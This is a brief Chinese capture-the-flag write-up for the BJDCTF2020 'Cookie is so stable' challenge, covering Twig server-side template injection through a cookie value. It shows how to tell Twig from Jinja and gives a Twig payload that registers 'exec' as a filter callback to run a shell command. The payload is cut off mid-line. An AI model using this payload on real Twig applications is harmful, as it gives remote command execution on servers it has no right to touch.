[BJDCTF2020]Cookie is so stable

ssti Twig模板注入 发现这个输入框存在ssti漏洞。 如果输出49那么是Twig,如果是7777777那么就是jinja 在源代码中可以发现提示: 这条提示说明注入点在cookie。 修改cookie得到flag payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /
相关文章
相关标签/搜索